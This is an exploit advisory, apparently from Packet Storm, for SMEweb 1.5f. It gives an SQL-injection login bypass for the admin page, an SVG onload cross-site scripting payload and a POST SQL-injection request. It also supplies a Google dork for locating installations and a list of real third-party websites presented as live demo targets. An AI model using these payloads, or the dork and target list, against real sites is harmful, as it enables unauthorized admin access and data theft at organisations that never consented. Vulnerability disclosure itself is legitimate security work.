SMEweb 1.5f Cross Site Scripting / SQL Injection

2016-02-09T00:00:00
ID PACKETSTORM:135682
Type packetstorm
Reporter T3NZOG4N
Modified 2016-02-09T00:00:00

Description

                                        
                                            `######################  
# Exploit Title : SMEweb 1.5f Multiple Vulnerability  
# Exploit Author : Persian Hack Team  
# Vendor Homepage : http://www.ebizzi.net/  
# Google Dork : "Powered by SMEweb"  
# Date: 2016/02/07  
# Version: 1.5f  
######################  
# PoC:  
# 1-Admin Page Bypass  
# Username : '=''or'  
# Password : '=''or'  
# Demo :   
# http://www.greenboxgps-pattaya.com/admin.php  
# http://www.classi-5.com/admin.php  
# http://www.gpsphitsanulok.com/admin.php  
# http://www.bigmapcarservice.com/admin.php  
# http://www.design-athome.com/tuba/admin.php  
# http://www.clouds-scada.com/home/admin.php  
#  
# 2-Cross Site Scripting  
# Payload : ">Persian<svg%2Fonload%3Dconfirm(%2FMobhaM%2F)>Hack Team  
# Demo : http://www.adhdthai.com/autistic/bb.php?page=[XSS]  
#  
# 3-POST SQL Injection  
# b5,act,topic Parameter   
# Demo : http://www.gpsphitsanulok.com/bb.php  
# POST /bb.php HTTP/1.1  
# Content-Length: 40  
# Content-Type: application/x-www-form-urlencoded  
# Referer: http://www.gpsphitsanulok.com/  
# Cookie: PHPSESSID=qil93tefc4beq1ohablhpba071  
# Host: www.gpsphitsanulok.com  
# Connection: Keep-alive  
# Accept-Encoding: gzip,deflate  
# User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like$  
# Accept: */*  
#  
# act=6&b2=1&b3=1&b5=1&repid=&topicid=  
#  
#  
######################  
# Discovered by :  
# Mojtaba MobhaM (kazemimojtaba@live.com)  
# T3NZOG4N (t3nz0g4n@yahoo.com)  
# Homepage : persian-team.ir  
######################   
`